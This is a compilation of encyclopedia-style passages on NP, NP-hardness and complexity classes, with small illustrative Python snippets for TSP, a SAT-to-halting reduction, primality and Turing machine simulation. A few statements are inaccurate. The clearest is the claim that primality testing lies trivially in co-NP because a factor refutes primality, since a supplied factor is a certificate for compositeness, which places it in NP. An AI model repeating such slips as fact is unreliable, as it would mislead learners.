Equivalent to the verifier-based definition is the following characterization: NP is the class of decision problems solvable by a nondeterministic Turing machine that runs in polynomial time. That is to say, a decision problem $\Pi$ is in NP whenever $\Pi$ is recognized by some polynomial-time nondeterministic Turing machine $M$ with an existential acceptance condition, meaning that $w\in \Pi$ if and only if some computation path of $M(w)$ leads to an accepting state. This definition is equivalent to the verifier-based definition because a nondeterministic Turing machine could solve an NP problem in polynomial time by nondeterministically selecting a certificate and running the verifier on the certificate. Similarly, if such a machine exists, then a polynomial-time verifier can naturally be constructed from it.

In this light, we can define co-NP dually as the class of decision problems recognizable by polynomial-time nondeterministic Turing machines with an existential rejection condition. Since an existential rejection condition is exactly the same thing as a universal acceptance condition, we can understand the NP vs. co-NP question as asking whether the existential and universal acceptance conditions have the same expressive power for the class of polynomial-time nondeterministic Turing machines.

NP is closed under union, intersection, concatenation, Kleene star and reversal. It is not known whether NP is closed under complement (this question is the so-called "NP versus co-NP" question).

Because of the many important problems in this class, there have been extensive efforts to find polynomial-time algorithms for problems in NP. However, there remain a large number of problems in NP that defy such attempts, seeming to require super-polynomial time. Whether these problems are not decidable in polynomial time is one of the greatest open questions in computer science (see P versus NP ("P = NP") problem for an in-depth discussion). An important notion in this context is the set of NP-complete decision problems, which is a subset of NP and might be informally described as the "hardest" problems in NP. If there is a polynomial-time algorithm for even one of them, then there is a polynomial-time algorithm for all the problems in NP. Because of this, and because dedicated research has failed to find a polynomial algorithm for any NP-complete problem, once a problem has been proven to be NP-complete, this is widely regarded as a sign that a polynomial algorithm for this problem is unlikely to exist.
However, in practical uses, instead of spending computational resources looking for an optimal solution, a good enough (but potentially suboptimal) solution may often be found in polynomial time. Also, the real-life applications of some problems are easier than their theoretical equivalents.

The two definitions of NP as the class of problems solvable by a nondeterministic Turing machine (TM) in polynomial time and the class of problems verifiable by a deterministic Turing machine in polynomial time are equivalent. The proof is described by many textbooks, for example, Sipser's Introduction to the Theory of Computation, section 7.3.

To show this, first, suppose we have a deterministic verifier. A non-deterministic machine can simply nondeterministically run the verifier on all possible proof strings (this requires only polynomially many steps because it can nondeterministically choose the next character in the proof string in each step, and the length of the proof string must be polynomially bounded). If any proof is valid, some path will accept; if no proof is valid, the string is not in the language and it will reject. Conversely, suppose we have a non-deterministic TM called A accepting a given language L. At each of its polynomially many steps, the machine's computation tree branches in at most a finite number of directions. There must be at least one accepting path, and the string describing this path is the proof supplied to the verifier. The verifier can then deterministically simulate A, following only the accepting path, and verifying that it accepts at the end. If A rejects the input, there is no accepting path, and the verifier will always reject.

NP contains all problems in P, since one can verify any instance of the problem by simply ignoring the proof and solving it. NP is contained in PSPACE—to show this, it suffices to construct a PSPACE machine that loops over all proof strings and feeds each one to a polynomial-time verifier. Since a polynomial-time machine can only read polynomially many bits, it cannot use more than polynomial space, nor can it read a proof string occupying more than polynomial space (so we do not have to consider proofs longer than this). NP is also contained in EXPTIME, since the same algorithm operates in exponential time. co-NP contains those problems that have a simple proof for no instances, sometimes called counterexamples. For example, primality testing trivially lies in co-NP, since one can refute the primality of an integer by merely supplying a nontrivial factor. NP and co-NP together form the first level in the polynomial hierarchy, higher only than P.

NP is defined using only deterministic machines. If we permit the verifier to be probabilistic (this, however, is not necessarily a BPP machine[6]), we get the class MA, solvable using an Arthur–Merlin protocol with no communication from Arthur to Merlin. The relationship between BPP and NP is unknown: it is not known whether BPP is a subset of NP, NP is a subset of BPP, or neither. If NP is contained in BPP, which is considered unlikely since it would imply practical solutions for NP-complete problems, then NP = RP and PH ⊆ BPP.[7]

NP is a class of decision problems; the analogous class of function problems is FNP. The only known strict inclusions come from the time hierarchy theorem and the space hierarchy theorem, and respectively they are $\mathsf{NP}\subsetneq \mathsf{NEXPTIME}$ and $\mathsf{NP}\subsetneq \mathsf{EXPSPACE}$.
In terms of descriptive complexity theory, NP corresponds precisely to the set of languages definable by existential second-order logic (Fagin's theorem).

NP can be seen as a very simple type of interactive proof system, where the prover comes up with the proof certificate and the verifier is a deterministic polynomial-time machine that checks it. It is complete because the right proof string will make it accept if there is one, and it is sound because the verifier cannot accept if there is no acceptable proof string.

A major result of complexity theory is that NP can be characterized as the problems solvable by probabilistically checkable proofs where the verifier uses O(log n) random bits and examines only a constant number of bits of the proof string (the class PCP(log n, 1)). More informally, this means that the NP verifier described above can be replaced with one that just "spot-checks" a few places in the proof string, and using a limited number of coin flips can determine the correct answer with high probability. This allows several results about the hardness of approximation algorithms to be proven.

All problems in P are in NP, denoted P ⊆ NP: given a certificate for a problem in P, we can ignore the certificate and just solve the problem in polynomial time.

The decision problem version of the integer factorization problem is in NP: given integers n and k, is there a factor f with 1 < f < k and f dividing n?[8]

Every NP-complete problem is in NP. One example is the Boolean satisfiability problem (SAT), where we want to know whether or not a certain formula in propositional logic with Boolean variables is true for some value of the variables.[9]

The decision version of the travelling salesman problem is in NP. Given an input matrix of distances between n cities, the problem is to determine if there is a route visiting all cities with total distance less than k. A proof can simply be a list of the cities. Then verification can clearly be done in polynomial time; it simply adds the matrix entries corresponding to the paths between the cities. A nondeterministic Turing machine can find such a route by nondeterministically guessing the sequence of cities to visit. One can think of each guess as "forking" a new copy of the Turing machine to follow each of the possible paths forward, and if at least one machine finds a route of distance less than k, that machine accepts the input. (Equivalently, this can be thought of as a single Turing machine that always guesses correctly.) A binary search on the range of possible distances can convert the decision version of Traveling Salesman to the optimization version, by calling the decision version repeatedly (a polynomial number of times).[10][8]

The subgraph isomorphism problem of determining whether graph G contains a subgraph that is isomorphic to graph H is also in NP.[11]
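The decision-to-optimization conversion for the travelling salesman problem described above can be illustrated directly. The sketch below is purely illustrative: it brute-forces the decision question "is there a tour of total distance less than k?" (standing in for the nondeterministic guessing) and then binary-searches over k:

```python
from itertools import permutations

def tour_length(dist, route):
    # Total length of a closed tour visiting the cities in `route`.
    return sum(dist[route[i]][route[(i + 1) % len(route)]] for i in range(len(route)))

def tsp_decision(dist, k):
    # Decision version: is there a tour of total distance strictly less than k?
    n = len(dist)
    return any(tour_length(dist, (0,) + p) < k for p in permutations(range(1, n)))

def tsp_optimum(dist):
    # Binary search over integer thresholds using only the decision procedure.
    lo, hi = 0, sum(map(sum, dist)) + 1   # no tour < lo; some tour < hi
    while lo + 1 < hi:
        mid = (lo + hi) // 2
        if tsp_decision(dist, mid):
            hi = mid
        else:
            lo = mid
    return lo                             # lo ends equal to the optimal tour length

dist = [[0, 2, 9, 10],
        [2, 0, 6, 4],
        [9, 6, 0, 8],
        [10, 4, 8, 0]]
print(tsp_optimum(dist))   # 23 for this matrix (tour 0 -> 1 -> 3 -> 2 -> 0)
```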
https://en.wikipedia.org/wiki/Nondeterministic_polynomial_time
In computational complexity theory, a computational problem H is called NP-hard if, for every problem L which can be solved in non-deterministic polynomial time, there is a polynomial-time reduction from L to H. That is, assuming a solution for H takes 1 unit time, H's solution can be used to solve L in polynomial time.[1][2] As a consequence, finding a polynomial-time algorithm to solve a single NP-hard problem would give polynomial-time algorithms for all the problems in the complexity class NP. As it is suspected, but unproven, that P ≠ NP, it is unlikely that any polynomial-time algorithms for NP-hard problems exist.[3][4]

A simple example of an NP-hard problem is the subset sum problem.

Informally, if H is NP-hard, then it is at least as difficult to solve as the problems in NP. However, the opposite direction is not true: some problems are undecidable, and therefore even more difficult to solve than all problems in NP, but they are probably not NP-hard (unless P = NP).[5]

A decision problem H is NP-hard when for every problem L in NP, there is a polynomial-time many-one reduction from L to H.[1]: 80 Another definition is to require that there be a polynomial-time reduction from an NP-complete problem G to H.[1]: 91 As any problem L in NP reduces in polynomial time to G, L reduces in turn to H in polynomial time, so this new definition implies the previous one. It does not restrict the class NP-hard to decision problems, and it also includes search problems or optimization problems.

If P ≠ NP, then NP-hard problems could not be solved in polynomial time.

Some NP-hard optimization problems can be polynomial-time approximated up to some constant approximation ratio (in particular, those in APX) or even up to any approximation ratio (those in PTAS or FPTAS). There are many classes of approximability, each one enabling approximation up to a different level.[6]

All NP-complete problems are also NP-hard (see List of NP-complete problems). For example, the optimization problem of finding the least-cost cyclic route through all nodes of a weighted graph—commonly known as the travelling salesman problem—is NP-hard.[7] The subset sum problem is another example: given a set of integers, does any non-empty subset of them add up to zero? That is a decision problem and happens to be NP-complete.

There are decision problems that are NP-hard but not NP-complete, such as the halting problem. That is the problem which asks "given a program and its input, will it run forever?" That is a yes/no question and so is a decision problem. It is easy to prove that the halting problem is NP-hard but not NP-complete. For example, the Boolean satisfiability problem can be reduced to the halting problem by transforming it to the description of a Turing machine that tries all truth value assignments and, when it finds one that satisfies the formula, halts; otherwise it goes into an infinite loop. It is also easy to see that the halting problem is not in NP, since all problems in NP are decidable in a finite number of operations, but the halting problem, in general, is undecidable. There are also NP-hard problems that are neither NP-complete nor undecidable. For instance, the language of true quantified Boolean formulas is decidable in polynomial space, but not in non-deterministic polynomial time (unless NP = PSPACE).[8]

NP-hard problems do not have to be elements of the complexity class NP.
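The reduction from Boolean satisfiability to the halting problem described above can be sketched in a few lines of code. Given a CNF formula, we build a program that halts if and only if the formula is satisfiable; the integer-literal encoding of clauses is an assumption made for the illustration:

```python
from itertools import product

def formula_to_program(cnf, num_vars):
    """Return a zero-argument function that halts iff `cnf` is satisfiable.

    `cnf` is a list of clauses; each clause is a list of nonzero integers,
    where literal i means variable i and -i means its negation.
    """
    def program():
        while True:  # loops forever unless a satisfying assignment is found
            for bits in product([False, True], repeat=num_vars):
                assign = {i + 1: bits[i] for i in range(num_vars)}
                if all(any(assign[abs(l)] == (l > 0) for l in clause) for clause in cnf):
                    return  # halt: the formula is satisfiable
    return program

# (x1 or not x2) and (not x1 or x2) is satisfiable, so this program halts.
sat_program = formula_to_program([[1, -2], [-1, 2]], num_vars=2)
sat_program()
# An unsatisfiable formula such as [[1], [-1]] would yield a program that never halts.
```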
As NP plays a central role in computational complexity, it is used as the basis of several related classes, among them NP-complete and NP-hard. NP-hard problems are often tackled with rules-based languages in application areas such as planning and scheduling. Problems that are decidable but not NP-complete are often optimization problems.
https://en.wikipedia.org/wiki/NP-hardness
In computational complexity theory, a complexity class is a set of computational problems "of related resource-based complexity".[1] The two most commonly analyzed resources are time and memory.

In general, a complexity class is defined in terms of a type of computational problem, a model of computation, and a bounded resource like time or memory. In particular, most complexity classes consist of decision problems that are solvable with a Turing machine, and are differentiated by their time or space (memory) requirements. For instance, the class P is the set of decision problems solvable by a deterministic Turing machine in polynomial time. There are, however, many complexity classes defined in terms of other types of problems (e.g. counting problems and function problems) and using other models of computation (e.g. probabilistic Turing machines, interactive proof systems, Boolean circuits, and quantum computers).

The study of the relationships between complexity classes is a major area of research in theoretical computer science. There are often general hierarchies of complexity classes; for example, it is known that a number of fundamental time and space complexity classes relate to each other in the following way: L ⊆ NL ⊆ P ⊆ NP ⊆ PSPACE ⊆ EXPTIME ⊆ NEXPTIME ⊆ EXPSPACE (where ⊆ denotes the subset relation). However, many relationships are not yet known; for example, one of the most famous open problems in computer science concerns whether P equals NP. The relationships between classes often answer questions about the fundamental nature of computation. The P versus NP problem, for instance, is directly related to questions of whether nondeterminism adds any computational power to computers and whether problems having solutions that can be quickly checked for correctness can also be quickly solved.

Complexity classes are sets of related computational problems. They are defined in terms of the computational difficulty of solving the problems contained within them with respect to particular computational resources like time or memory. More formally, the definition of a complexity class consists of three things: a type of computational problem, a model of computation, and a bounded computational resource. In particular, most complexity classes consist of decision problems that can be solved by a Turing machine with bounded time or space resources. For example, the complexity class P is defined as the set of decision problems that can be solved by a deterministic Turing machine in polynomial time.

Intuitively, a computational problem is just a question that can be solved by an algorithm. For example, "is the natural number $n$ prime?" is a computational problem. A computational problem is mathematically represented as the set of answers to the problem. In the primality example, the problem (call it $\texttt{PRIME}$) is represented by the set of all natural numbers that are prime: $\texttt{PRIME}=\{n\in \mathbb {N} \mid n{\text{ is prime}}\}$. In the theory of computation, these answers are represented as strings; for example, in the primality example the natural numbers could be represented as strings of bits that represent binary numbers. For this reason, computational problems are often synonymously referred to as languages, since strings of bits represent formal languages (a concept borrowed from linguistics); for example, saying that the $\texttt{PRIME}$ problem is in the complexity class P is equivalent to saying that the language $\texttt{PRIME}$ is in P.
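As a concrete illustration of a problem viewed as a language, membership in PRIME can be decided by a simple algorithm. The sketch below uses trial division, which is correct but not polynomial time in the length of the input (so it says nothing about PRIME being in P); it accepts exactly those bit strings that encode prime numbers:

```python
def decides_prime(binary_string):
    """Decide membership of a bit string in the language PRIME.

    The string encodes a natural number in binary; accept exactly when that
    number is prime. (Trial division is exponential in the input length, so
    this is only an illustration of deciding the language, not of PRIME in P.)
    """
    n = int(binary_string, 2)
    if n < 2:
        return False      # reject
    d = 2
    while d * d <= n:
        if n % d == 0:
            return False  # reject: composite
        d += 1
    return True           # accept: prime

print(decides_prime("1101"))  # 13 -> accept
print(decides_prime("1111"))  # 15 -> reject
```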
The most commonly analyzed problems in theoretical computer science are decision problems—the kinds of problems that can be posed as yes–no questions. The primality example above, for instance, is an example of a decision problem as it can be represented by the yes–no question "is the natural number $n$ prime". In terms of the theory of computation, a decision problem is represented as the set of input strings that a computer running a correct algorithm would answer "yes" to. In the primality example, $\texttt{PRIME}$ is the set of strings representing natural numbers for which, when input into a computer running an algorithm that correctly tests for primality, the algorithm answers "yes, this number is prime". This "yes-no" format is often equivalently stated as "accept-reject"; that is, an algorithm "accepts" an input string if the answer to the decision problem is "yes" and "rejects" if the answer is "no".

While some problems cannot easily be expressed as decision problems, they nonetheless encompass a broad range of computational problems.[2] Other types of problems that certain complexity classes are defined in terms of include counting problems and function problems.

To make concrete the notion of a "computer", in theoretical computer science problems are analyzed in the context of a computational model. Computational models make exact the notions of computational resources like "time" and "memory". In computational complexity theory, complexity classes deal with the inherent resource requirements of problems and not the resource requirements that depend upon how a physical computer is constructed. For example, in the real world different computers may require different amounts of time and memory to solve the same problem because of the way that they have been engineered. By providing abstract mathematical representations of computers, computational models abstract away superfluous complexities of the real world (like differences in processor speed) that obstruct an understanding of fundamental principles.

The most commonly used computational model is the Turing machine. While other models exist and many complexity classes are defined in terms of them (see section "Other models of computation"), the Turing machine is used to define most basic complexity classes. With the Turing machine, instead of using standard units of time like the second (which make it impossible to disentangle running time from the speed of physical hardware) and standard units of memory like bytes, the notion of time is abstracted as the number of elementary steps that a Turing machine takes to solve a problem and the notion of memory is abstracted as the number of cells that are used on the machine's tape. These are explained in greater detail below.

It is also possible to use the Blum axioms to define complexity classes without referring to a concrete computational model, but this approach is less frequently used in complexity theory.

A Turing machine is a mathematical model of a general computing machine. It is the most commonly used model in complexity theory, owing in large part to the fact that it is believed to be as powerful as any other model of computation and is easy to analyze mathematically. Importantly, it is believed that if there exists an algorithm that solves a particular problem then there also exists a Turing machine that solves that same problem (this is known as the Church–Turing thesis); this means that it is believed that every algorithm can be represented as a Turing machine.
Mechanically, a Turing machine (TM) manipulates symbols (generally restricted to the bits 0 and 1 to provide an intuitive connection to real-life computers) contained on an infinitely long strip of tape. The TM can read and write, one at a time, using a tape head. Operation is fully determined by a finite set of elementary instructions such as "in state 42, if the symbol seen is 0, write a 1; if the symbol seen is 1, change into state 17; in state 17, if the symbol seen is 0, write a 1 and change to state 6". The Turing machine starts with only the input string on its tape and blanks everywhere else. The TM accepts the input if it enters a designated accept state and rejects the input if it enters a reject state. The deterministic Turing machine (DTM) is the most basic type of Turing machine. It uses a fixed set of rules to determine its future actions (which is why it is called "deterministic").

A computational problem can then be defined in terms of a Turing machine as the set of input strings that a particular Turing machine accepts. For example, the primality problem $\texttt{PRIME}$ from above is the set of strings (representing natural numbers) that a Turing machine running an algorithm that correctly tests for primality accepts. A Turing machine is said to recognize a language (recall that "problem" and "language" are largely synonymous in computability and complexity theory) if it accepts all inputs that are in the language, and is said to decide a language if it additionally rejects all inputs that are not in the language (certain inputs may cause a Turing machine to run forever, so decidability places the additional constraint over recognizability that the Turing machine must halt on all inputs). A Turing machine that "solves" a problem is generally meant to mean one that decides the language.

Turing machines enable intuitive notions of "time" and "space". The time complexity of a TM on a particular input is the number of elementary steps that the Turing machine takes to reach either an accept or reject state. The space complexity is the number of cells on its tape that it uses to reach either an accept or reject state.

The deterministic Turing machine (DTM) is a variant of the nondeterministic Turing machine (NTM). Intuitively, an NTM is just a regular Turing machine that has the added capability of being able to explore multiple possible future actions from a given state, and "choosing" a branch that accepts (if any accept). That is, while a DTM must follow only one branch of computation, an NTM can be imagined as a computation tree, branching into many possible computational pathways at each step. If at least one branch of the tree halts with an "accept" condition, then the NTM accepts the input. In this way, an NTM can be thought of as simultaneously exploring all computational possibilities in parallel and selecting an accepting branch.[3] NTMs are not meant to be physically realizable models; they are simply theoretically interesting abstract machines that give rise to a number of interesting complexity classes (which often do have physically realizable equivalent definitions).

The time complexity of an NTM is the maximum number of steps that the NTM uses on any branch of its computation.[4] Similarly, the space complexity of an NTM is the maximum number of cells that the NTM uses on any branch of its computation. DTMs can be viewed as a special case of NTMs that do not make use of the power of nondeterminism.
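The informal description of a deterministic Turing machine above maps directly onto a small simulator. The following sketch (the example machine and its transition table are made up for illustration) runs a DTM while counting the elementary steps taken and the tape cells touched—the quantities on which the time and space measures discussed below are based:

```python
def run_dtm(transitions, tape, start, accept, reject, blank="_"):
    """Simulate a deterministic Turing machine, counting time and space used."""
    cells = dict(enumerate(tape))     # sparse tape: position -> symbol
    state, head, steps = start, 0, 0
    visited = {0}
    while state not in (accept, reject):
        symbol = cells.get(head, blank)
        state, write, move = transitions[(state, symbol)]
        cells[head] = write
        head += 1 if move == "R" else -1
        visited.add(head)
        steps += 1
    return state == accept, steps, len(visited)

# A made-up machine: scan right past the 1s, append one more 1, then accept.
transitions = {
    ("scan", "1"): ("scan", "1", "R"),
    ("scan", "_"): ("done", "1", "R"),
}
accepted, time_used, space_used = run_dtm(transitions, "111", "scan", "done", "fail")
print(accepted, time_used, space_used)   # True, 4 steps, 5 tape cells touched
```

Since a DTM never branches, the run above also traces the single computation path of an NTM that happens to have exactly one available move at each step.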
Hence, every computation that can be carried out by a DTM can also be carried out by an equivalent NTM. It is also possible to simulate any NTM using a DTM (the DTM will simply compute every possible computational branch one-by-one). Hence, the two are equivalent in terms of computability. However, simulating an NTM with a DTM often requires greater time and/or memory resources; as will be seen, how significant this slowdown is for certain classes of computational problems is an important question in computational complexity theory.

Complexity classes group computational problems by their resource requirements. To do this, computational problems are differentiated by upper bounds on the maximum amount of resources that the most efficient algorithm takes to solve them. More specifically, complexity classes are concerned with the rate of growth in the resources required to solve particular computational problems as the input size increases. For example, the amount of time it takes to solve problems in the complexity class P grows at a polynomial rate as the input size increases, which is slow compared to problems in the exponential complexity class EXPTIME (or more accurately, compared to problems in EXPTIME that are outside of P, since P ⊆ EXPTIME).

Note that the study of complexity classes is intended primarily to understand the inherent complexity required to solve computational problems. Complexity theorists are thus generally concerned with finding the smallest complexity class that a problem falls into and are therefore concerned with identifying which class a computational problem falls into using the most efficient algorithm. There may be an algorithm, for instance, that solves a particular problem in exponential time, but if the most efficient algorithm for solving this problem runs in polynomial time then the inherent time complexity of that problem is better described as polynomial.

The time complexity of an algorithm with respect to the Turing machine model is the number of steps it takes for a Turing machine to run an algorithm on a given input size. Formally, the time complexity for an algorithm implemented with a Turing machine M is defined as the function t_M : ℕ → ℕ, where t_M(n) is the maximum number of steps that M takes on any input of length n. In computational complexity theory, theoretical computer scientists are concerned less with particular runtime values and more with the general class of functions that the time complexity function falls into. For instance, is the time complexity function a polynomial? A logarithmic function? An exponential function? Or another kind of function?

The space complexity of an algorithm with respect to the Turing machine model is the number of cells on the Turing machine's tape that are required to run an algorithm on a given input size. Formally, the space complexity of an algorithm implemented with a Turing machine M is defined as the function s_M : ℕ → ℕ, where s_M(n) is the maximum number of cells that M uses on any input of length n.

Complexity classes are often defined using granular sets of complexity classes called DTIME and NTIME (for time complexity) and DSPACE and NSPACE (for space complexity).
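The branch-by-branch simulation just described can be illustrated with a toy guess-and-verify problem. The subset-sum formulation and the names below are illustrative assumptions; the point is that deterministically trying every sequence of binary choices takes exponential work, while checking a single given branch (a certificate) is cheap.

```python
# A sketch of how a deterministic machine can simulate nondeterministic
# guessing: every sequence of binary "choices" (include each number or not)
# is tried one branch at a time.
from itertools import product

def exists_accepting_branch(numbers, target):
    """Deterministic simulation: try all 2^n nondeterministic branches."""
    for choices in product([0, 1], repeat=len(numbers)):      # exponential work
        if sum(x for x, c in zip(numbers, choices) if c) == target:
            return True                                        # some branch accepts
    return False

def verify(numbers, target, certificate):
    """A single branch (a certificate) is checkable in polynomial time."""
    return sum(x for x, c in zip(numbers, certificate) if c) == target

nums, t = [3, 9, 8, 4], 12
print(exists_accepting_branch(nums, t))     # True (e.g. 8 + 4)
print(verify(nums, t, (0, 0, 1, 1)))        # True
```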
Using big O notation, they are defined as follows:

P is the class of problems that are solvable by a deterministic Turing machine in polynomial time and NP is the class of problems that are solvable by a nondeterministic Turing machine in polynomial time. Or more formally,

P is often said to be the class of problems that can be solved "quickly" or "efficiently" by a deterministic computer, since the time complexity of solving a problem in P increases relatively slowly with the input size.

An important characteristic of the class NP is that it can be equivalently defined as the class of problems whose solutions are verifiable by a deterministic Turing machine in polynomial time. That is, a language is in NP if there exists a deterministic polynomial-time Turing machine, referred to as the verifier, that takes as input a string w and a polynomial-size certificate string c, and accepts w if w is in the language and rejects w if w is not in the language. Intuitively, the certificate acts as a proof that the input w is in the language. Formally:[5]

This equivalence between the nondeterministic definition and the verifier definition highlights a fundamental connection between nondeterminism and solution verifiability. Furthermore, it also provides a useful method for proving that a language is in NP: simply identify a suitable certificate and show that it can be verified in polynomial time.

While there might seem to be an obvious difference between the class of problems that are efficiently solvable and the class of problems whose solutions are merely efficiently checkable, P and NP are actually at the center of one of the most famous unsolved problems in computer science: the P versus NP problem. While it is known that P ⊆ NP (intuitively, deterministic Turing machines are just a subclass of nondeterministic Turing machines that don't make use of their nondeterminism; or, under the verifier definition, P is the class of problems whose polynomial-time verifiers need only receive the empty string as their certificate), it is not known whether NP is strictly larger than P. If P = NP, then it follows that nondeterminism provides no additional computational power over determinism with regards to the ability to quickly find a solution to a problem; that is, being able to explore all possible branches of computation provides at most a polynomial speedup over being able to explore only a single branch. Furthermore, it would follow that if there exists a proof for a problem instance and that proof can quickly be checked for correctness (that is, if the problem is in NP), then there also exists an algorithm that can quickly construct that proof (that is, the problem is in P).[6] However, the overwhelming majority of computer scientists believe that P ≠ NP,[7] and most cryptographic schemes employed today rely on the assumption that P ≠ NP.[8]

EXPTIME (sometimes shortened to EXP) is the class of decision problems solvable by a deterministic Turing machine in exponential time and NEXPTIME (sometimes shortened to NEXP) is the class of decision problems solvable by a nondeterministic Turing machine in exponential time. Or more formally,

EXPTIME is a strict superset of P and NEXPTIME is a strict superset of NP. It is further the case that EXPTIME ⊆ NEXPTIME.
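For reference, the formal definitions alluded to above ("or more formally") are usually stated roughly as follows; this is a sketch of the standard textbook formulations.

```latex
\begin{align*}
\mathsf{DTIME}(t(n)) &= \{\, L \mid L \text{ is decided by a deterministic TM in } O(t(n)) \text{ time} \,\}\\
\mathsf{NTIME}(t(n)) &= \{\, L \mid L \text{ is decided by a nondeterministic TM in } O(t(n)) \text{ time} \,\}\\
\mathsf{P} &= \bigcup_{k\in\mathbb{N}} \mathsf{DTIME}\!\left(n^{k}\right), \qquad
\mathsf{NP} = \bigcup_{k\in\mathbb{N}} \mathsf{NTIME}\!\left(n^{k}\right)\\
\mathsf{EXPTIME} &= \bigcup_{k\in\mathbb{N}} \mathsf{DTIME}\!\left(2^{n^{k}}\right), \qquad
\mathsf{NEXPTIME} = \bigcup_{k\in\mathbb{N}} \mathsf{NTIME}\!\left(2^{n^{k}}\right)
\end{align*}
% Verifier characterization of NP:
L \in \mathsf{NP} \iff \exists \text{ a polynomial } p \text{ and a polynomial-time verifier } V
\text{ such that } w \in L \iff \exists\, c \in \{0,1\}^{p(|w|)} : V(w,c)=1 .
```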
It is not known whether this is proper, but if P = NP then EXPTIME must equal NEXPTIME.

While it is possible to define logarithmic time complexity classes, these are extremely narrow classes as sublinear times do not even enable a Turing machine to read the entire input (because log n < n).[a][9] However, there are a meaningful number of problems that can be solved in logarithmic space. The definitions of these classes require a two-tape Turing machine so that it is possible for the machine to store the entire input (it can be shown that in terms of computability the two-tape Turing machine is equivalent to the single-tape Turing machine).[10] In the two-tape Turing machine model, one tape is the input tape, which is read-only. The other is the work tape, which allows both reading and writing and is the tape on which the Turing machine performs computations. The space complexity of the Turing machine is measured as the number of cells that are used on the work tape.

L (sometimes lengthened to LOGSPACE) is then defined as the class of problems solvable in logarithmic space on a deterministic Turing machine, and NL (sometimes lengthened to NLOGSPACE) is the class of problems solvable in logarithmic space on a nondeterministic Turing machine. Or more formally,[10]

It is known that L ⊆ NL ⊆ P. However, it is not known whether any of these relationships is proper.

The complexity classes PSPACE and NPSPACE are the space analogues to P and NP. That is, PSPACE is the class of problems solvable in polynomial space by a deterministic Turing machine and NPSPACE is the class of problems solvable in polynomial space by a nondeterministic Turing machine. More formally,

While it is not known whether P = NP, Savitch's theorem famously showed that PSPACE = NPSPACE. It is also known that P ⊆ PSPACE, which follows intuitively from the fact that, since writing to a cell on a Turing machine's tape is defined as taking one unit of time, a Turing machine operating in polynomial time can only write to polynomially many cells. It is suspected that P is strictly smaller than PSPACE, but this has not been proven.

The complexity classes EXPSPACE and NEXPSPACE are the space analogues to EXPTIME and NEXPTIME. That is, EXPSPACE is the class of problems solvable in exponential space by a deterministic Turing machine and NEXPSPACE is the class of problems solvable in exponential space by a nondeterministic Turing machine. Or more formally,

Savitch's theorem showed that EXPSPACE = NEXPSPACE. This class is extremely broad: it is known to be a strict superset of PSPACE, NP, and P, and is believed to be a strict superset of EXPTIME.

Complexity classes have a variety of closure properties. For example, decision classes may be closed under negation, disjunction, conjunction, or even under all Boolean operations. Moreover, they might also be closed under a variety of quantification schemes. P, for instance, is closed under all Boolean operations, and under quantification over polynomially sized domains. Closure properties can be helpful in separating classes: one possible route to separating two complexity classes is to find some closure property possessed by one class but not by the other.
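Likewise, the space classes just described are usually stated roughly as follows (a sketch of the standard formulations):

```latex
\begin{align*}
\mathsf{L} &= \mathsf{DSPACE}(\log n), &
\mathsf{NL} &= \mathsf{NSPACE}(\log n),\\
\mathsf{PSPACE} &= \bigcup_{k\in\mathbb{N}} \mathsf{DSPACE}\!\left(n^{k}\right), &
\mathsf{NPSPACE} &= \bigcup_{k\in\mathbb{N}} \mathsf{NSPACE}\!\left(n^{k}\right),\\
\mathsf{EXPSPACE} &= \bigcup_{k\in\mathbb{N}} \mathsf{DSPACE}\!\left(2^{n^{k}}\right), &
\mathsf{NEXPSPACE} &= \bigcup_{k\in\mathbb{N}} \mathsf{NSPACE}\!\left(2^{n^{k}}\right).
\end{align*}
% Known inclusions:
\mathsf{L} \subseteq \mathsf{NL} \subseteq \mathsf{P} \subseteq \mathsf{PSPACE}
= \mathsf{NPSPACE} \subseteq \mathsf{EXPSPACE}.
```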
Each class X that is not closed under negation has a complement class co-X, which consists of the complements of the languages contained in X (i.e. co-X = { L : the complement of L is in X }). co-NP, for instance, is one important complement complexity class, and sits at the center of the unsolved problem over whether co-NP = NP.

Closure properties are one of the key reasons many complexity classes are defined in the way that they are.[11] Take, for example, a problem that can be solved in O(n) time (that is, in linear time) and one that can be solved in, at best, O(n^1000) time. Both of these problems are in P, yet the runtime of the second grows considerably faster than the runtime of the first as the input size increases. One might ask whether it would be better to define the class of "efficiently solvable" problems using some smaller polynomial bound, like O(n^3), rather than all polynomials, which allows for such large discrepancies. It turns out, however, that the set of all polynomials is the smallest class of functions containing the linear functions that is also closed under addition, multiplication, and composition (for instance, O(n^3) ∘ O(n^2) = O(n^6), which is a polynomial but O(n^6) > O(n^3)).[11] Since we would like composing one efficient algorithm with another efficient algorithm to still be considered efficient, the polynomials are the smallest class that ensures composition of "efficient algorithms".[12] (Note that the definition of P is also useful because, empirically, almost all problems in P that are practically useful do in fact have low-order polynomial runtimes, and almost all problems outside of P that are practically useful do not have any known algorithms with small exponential runtimes, i.e. with O(c^n) runtimes where c is close to 1.[13])

Many complexity classes are defined using the concept of a reduction. A reduction is a transformation of one problem into another problem, i.e. a reduction takes inputs from one problem and transforms them into inputs of another problem. For instance, you can reduce ordinary base-10 addition x + y to base-2 addition by transforming x and y to their base-2 notation (e.g. 5 + 7 becomes 101 + 111). Formally, a problem X reduces to a problem Y if there exists a function f such that for every x ∈ Σ*, x ∈ X if and only if f(x) ∈ Y.

Generally, reductions are used to capture the notion of a problem being at least as difficult as another problem. Thus we are generally interested in using a polynomial-time reduction, since any problem X that can be efficiently reduced to another problem Y is no more difficult than Y. Formally, a problem X is polynomial-time reducible to a problem Y if there exists a polynomial-time computable function p such that for all x ∈ Σ*, x ∈ X if and only if p(x) ∈ Y. Note that reductions can be defined in many different ways. Common reductions are Cook reductions, Karp reductions and Levin reductions, and they can vary based on resource bounds, such as polynomial-time reductions and log-space reductions.
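The base-10 to base-2 reduction mentioned above can be written out directly. The instance format (a triple x, y, z asking whether x + y = z) is an illustrative choice; the point is that the transformation preserves membership and is itself cheap to compute.

```python
# A sketch of the reduction described above: an instance of "decimal addition"
# (does x + y = z in base 10?) is mapped to an instance of "binary addition".

def to_binary(decimal_string: str) -> str:
    return bin(int(decimal_string))[2:]

def reduce_instance(x: str, y: str, z: str) -> tuple[str, str, str]:
    """Transform a base-10 instance into the equivalent base-2 instance."""
    return to_binary(x), to_binary(y), to_binary(z)

def binary_addition_holds(x: str, y: str, z: str) -> bool:
    return int(x, 2) + int(y, 2) == int(z, 2)

# "5 + 7 = 12" (true in base 10) maps to "101 + 111 = 1100" (true in base 2).
print(reduce_instance("5", "7", "12"))                            # ('101', '111', '1100')
print(binary_addition_holds(*reduce_instance("5", "7", "12")))    # True
```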
